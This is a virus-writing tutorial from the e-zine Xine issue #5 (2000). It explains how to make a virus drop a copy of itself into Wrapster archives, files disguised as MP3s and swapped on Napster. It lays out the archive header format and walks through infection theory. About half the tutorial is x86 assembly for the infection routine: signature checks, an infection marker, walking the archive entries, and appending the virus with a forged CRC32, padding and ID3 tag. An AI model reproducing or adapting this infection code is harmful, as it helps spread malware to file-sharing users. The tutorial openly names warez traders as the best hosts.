ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Xine - issue #5 - Phile 112 ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Wrapster MP3 archieve infection tutorial ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Asmodeus iKX (c) 2000, xine#5 ÄÄÄÄÄÄÄÄÄÄÄÄ Introducion ÄÄÄÄÄÄÄÄÄÄÄÄ Infecting MP3 files is nice... well wrapster mp3 files are not ordinary mp3s.. well it's not really mp3s at all... It uses the mp3 exstension and some mp3 structures to make it look like a valid mp3 file. But in "reality" it's an archieve file that mainly is exchanged over the napster network. Too use it for anything would be plainly stupid as it applys no compression at all. In this article I'll teach you how to drop in an wrapster mp3 archieve but with a little skills and patients you can also extract/infect/re-add files to the archieves. The only real cool thing about wrapster archieve infection is that AV people will have to search for viruses in .MP3 files and that it enables your virus to be transmitted over the internet/napster network... Here is what the author of wrapster has to say about it... <--snip---> --( What is Wrapster? )-------------------------------------------------------- Wrapster is a state of the art program that will redefine the way you use Napster and the Internet in general. Napster (http://www.napster.com/) is an easy to use program that lets you join a community of users that share their MP3 files worldwide. Generally, you'd only use Napster for sharing digital audio files, but that's all about to change; this is where Wrapster comes into play. Wrapster lets you share ANY files through Napster, disguising them as legitimate MP3 files that are "encoded" at a specific bitrate. This special bitrate allows you to easily search for any Wrapster files that may be hiding on Napster servers. Here is an example of how Wrapster can be used to share ANY files you choose on the Napster network: Let's say a friend of yours has a copy of Win2K still zipped up from when (s)he first downloaded it from an IRC server. It's probably about 44 files in total, each of them being about 5 megs in size. Your friend simply runs Wrapster and creates a new archive with it. Then (s)he adds the 40-something or so files to the Wrapster archive and places it in their shared MP3 folder. You connect to the Napster network and search for either "Win2K" or the special bitrate that Wrapster uses to "encode" its files and low and behold it will appear in your search window. All you have to do now to get your copy of Win2K is download it just like any other legitimate MP3 file and when it's finally saved to your harddrive, just load up a copy of Wrapster and extract that operating system goodness. Bitrate = 32 Kb/s Frequency = 32000 Hz .. these are the search parameters you should key in if you wish to search for Wrapster files. Don't be alarmed if you don't find any Wrapster files on Napster at first. It may take a while for this to catch on. In the meantime just share your files and encourage others to do the same. <--snip---> ÄÄÄÄÄÄÄÄÄÄÄÄ Structure ÄÄÄÄÄÄÄÄÄÄÄÄ The wrapster file looks very much like any other archieve file like rar, arj etc. At the base of the wrapster file you will find a "main header" with some mp3 signature and some signature and version information as well as how many files are stored in the wrapster archieve. There is also a reserved (unused) slack space in this part of the header which could be used for an infection marker maybe? Well after the main header comes the file object header first file in the wrapter archieve... well I there is no real such names for it... but to make it a bit easier to grasp I'll name it and give you a good layout picture of it later. After the first file object header comes the actual data of the file and directly after the file data follows the file object header of the next file. The file object header contains information about the file such as the CRC32, filename and filesize it also holds a reserved (unused) slack space :) Ok lets have a quick look at the layout ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Wrapster main header ³ ³ ³ ³ þ FrameHeader 4 bytes ³ OFFSET : 00000000d ³ þ Reserved (Unused) 6 bytes ³ OFFSET : 00000004d ³ þ Signature 10 bytes ³ OFFSET : 00000010d ³ þ Version 8 bytes ³ OFFSET : 00000020d ³ þ FileCount 4 bytes ³ OFFSET : 00000028d ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ File object header ³ ³ ³ ³ þ OriginalFileName 256 bytes ³ OFFSET : 00000032d ³ þ Reserved (Unused) 32 bytes ³ OFFSET : 00000288d ³ þ CRC32 4 bytes ³ OFFSET : 00000320d ³ þ Size 4 bytes ³ OFFSET : 00000324d ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ File Data filesize bytes ³ OFFSET : 00000328d : : ú ú ú ú ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ File object header ³ ú ú etc..etc..etc After all file entries in the Wrapster file you will encounter padding that helps to assure that the files contained within the archive remain intact. This was done as a precaution since many downloads across Napster tend to get the last few bytes cut off. The last 128 bytes of the padding contain an MP3 identification tag that will show up in the play-list of programs like Winamp as an ID3 tag. You may put any values in here that you like. See the MP3 specification for more information "TAGNot A Winamp File Wrapster File", 83 dup (0) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Wrapster main header ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ þ FrameHeader 4 bytes : The "id" bytes of an legitimate mp3 file, sort of like the "MZ" bytes of an exe file. in hex "0xFF, 0xFB, 0x18, 0x0C" in ascii "ÿû " (note the first one is unprintable :) ) þ Reserved (Unused) 6 bytes : Unused space, that could be used in future versions of wrapster... or maybe by your virus as an infection marker? þ Signature 10 bytes : Wrapster signature followed by two null bytes. "wrapster",0,0 þ Version 8 bytes : Version number of wrapster followed by 6 null bytes for future versions :)) "1.0",0,0,0,0,0 þ FileCount 4 bytes : Number of files stored in wrapster archieve... this one is very important as you need it to parse the wrapster file and increase it if you add another file to the archieve. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ File object header ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ þ OriginalFileName 256 bytes : The filename of the file "relative" to the file object header (the file the header describes) þ Reserved (Unused) 32 bytes : Unused space, that could be used in future versions of wrapster... or maybe by your virus as an infection marker? þ CRC32 4 bytes : Calculated CRC32 of the data of the file (not with header and shit included , but the pure file data). The polynomial of the crc32 routine is very wacked and I have no idea of how to obtain it... it doesn't use same polynomial as zip/rar/arj etc, so the crc32 of those routines isn't valid. You some how have to get past this.. but in the latest version of wrapster it skips crc32 check by default, so it's not really a mayor problem but it's irritating. þ Size 4 bytes : Size of the file data "relative" to the file object header (the file the header describes) þ File data Actual file data þ Padding a couple of null bytes (3968 bytes or so :)) þ Mp3 tag The mp3 tag "TAGNot A Winamp File Wrapster File", 83 dup (0) ÄÄÄÄÄÄÄÄÄÄÄÄ Infection ÄÄÄÄÄÄÄÄÄÄÄÄ OK, first I'll take the theory and then I'll show you some code... But the code wouldn't work if you copy/paste it into your virus because I left out routines that open/map/unmap the files and such, that you could learn from some other tutorial... But if you are a bit smart then you'll know how to infect the wrapster archieve from reading the theoritical part and maybe peeking some at the code to get some ideas.. ÄÄÄÄÄÄÄÄÄÄÄÄ Theory ÄÄÄÄÄÄÄÄÄÄÄÄ First you should scan maybe the current directory for .MP3 files or if you access the filenames some other way like perprocess or kernel32.dll residency, doesn't really matter. When you found the file open it and map it in memory (well that is the method I prefer). Then check if it's a valid mp3 file and if it's a wrapster archieve. This can be done by checking the first 4 bytes and then the signature bytes at offset base+10d, you should also check for previous infection with the mark you done on infected files. Maybe the unused bytes at offset base+4d.. Ok if it's not infected then get the number of files stored in the wrapster file (base+28d) then get the filesize of the first file... adding main header size and the the file object header size to the file size of the data and you got the physical location of the next file object header...decrease the number of file entries and check if you hit zero count, if not keep adding file object header size and file size until you reach the end. Then you add another file object header describing the file you're about to add. But you could wait with this and prepare the header before adding it.. it must contain the filename/ filesize/crc32 of the file you're going to drop. Now you should open/map the file you want to drop into the wrapster archieve and calculate the crc32 of that file and save the size and drop the file object header... If you did as I said first, drop the header before calculating the values you must update the droped header with the new values... well after the header you write the actual data of the file and after that the padding bytes and the mp3 tag. Notice that when you map the file, add a couple of "slack-space" plus the size of padding/file to add/tag/headers etc if you "allocate" less than needed you will write beyond the memory boundary and into read-only memory which will cause some serious errors. ÄÄÄÄÄÄÄÄÄÄÄÄ Practice ÄÄÄÄÄÄÄÄÄÄÄÄ ;Some equotes, use the layout if you want to know the location of other ;values... Btw I recommend analyzing an wrapster mp3 archieve with a hex ;editor or softice (mapped and such) to see how it looks like... maybe ;get the grip of how the padding and MP3 tag is appended at the end... wrapster_Reserved equ 4d wrapster_Signature equ 10d wrapster_FileCount equ 28d wrapster_size equ 324d wrapster_pad equ 3968d infect_wrapster: pushad call open_map_virus mov dword ptr [ebp+virus_loc],eax test eax,eax popad jne mp3_infected ; Ok basicly, you should open/map the file you want to add to the wrapster ; archieve, when you decide to do this is irrelevant.. but take precaution ; so no important register values are fucked up.. cmp dword ptr [esi+10d], "parw" jne mp3_infected ; Check if the .MP3 file is a wrapster file, so you won't infect ordinary ; mp3s which would render them next to usless.. if not completely destroy ; them. The main header of the wrapster archieve contains the "wrapster" ; signature if you remember... check layout for more info about checks ; that could be performed. cmp dword ptr [esi+4d],"CAOR" je mp3_infected ; Check for previous infection... you could use the reserved slack space ; in after the mp3 signature bytes. mov edi,esi add edi,4d mov eax,"CAOR" stosd xor eax,eax mov al,"H" stosb ; well basicly mark the file infected :) add esi, wrapster_FileCount lodsd mov dword ptr [ebp+wrap_filecount],eax inc eax mov edi,esi sub edi,4d stosd ; save the number of files (file count) and increase it if you wanna ; add yet another file to the archieve. get_last_wrapter_entry: cmp dword ptr [ebp+wrap_filecount],0 je last_wrapter_entry dec dword ptr [ebp+wrap_filecount] add esi,292d lodsd add esi,eax jmp get_last_wrapter_entry last_wrapter_entry: ; Parse the wrapster object header structures to find the last file entry ; of the wrapster archieve add_virus_text: mov dword ptr [ebp+wrap_nh],esi push esi mov esi,dword ptr [ebp+virus_loc] mov ecx,dword ptr [ebp+virus_mem] call crc_calc lea edi,[ebp+w_crc32_off] stosd xor eax,eax mov eax,dword ptr [ebp+virus_mem] stosd pop esi mov edi,esi lea esi,[ebp+wrapster_header] mov ecx,wrapster_header_len cld rep movsb ; Calculate the CRC32 of the file and make sure you have the filesize ; of the file you wanna add.. prepare your custom file header and append ; it behind the last file entry. ; also append the file to drop in the archieve after the header. mov esi,dword ptr [ebp+virus_loc] mov ecx,dword ptr [ebp+virus_mem] cld rep movsb xor eax,eax mov ecx,wrapster_pad rep stosb ; Append padding bytes lea esi,[ebp+wrapster_tag] mov ecx,wrapster_tag_len cld rep movsb ; Append the MP3 Tag, to make more exqusite MP3 tags download the rfc about ; ID3 Tags or study ordinary MP3 files with a hexeditor.. pushad call close_open_virus popad ; Close up the file you added to the archieve jmp close_all ; Also close and unmap the wrapster archieve mp3_infected: mov ecx,dword ptr [ebp+unchanged_size] mov dword ptr [ebp+newfilesize],ecx jmp close_all ÄÄÄÄÄÄÄÄÄÄÄÄ Conclusion ÄÄÄÄÄÄÄÄÄÄÄÄ Well this is just another archieve among others... the only really advantage with droppping in wrapster archieves is that it's only internet related, and we like that right :)) Also it's almost only warez that is traded in wrapster archieves... well basicly it's only warez to be true :) Warez kiddies are the best hosts, CIH proved that... Btw if you want info on CRC32 or such you could mail me or check some other tutorial :)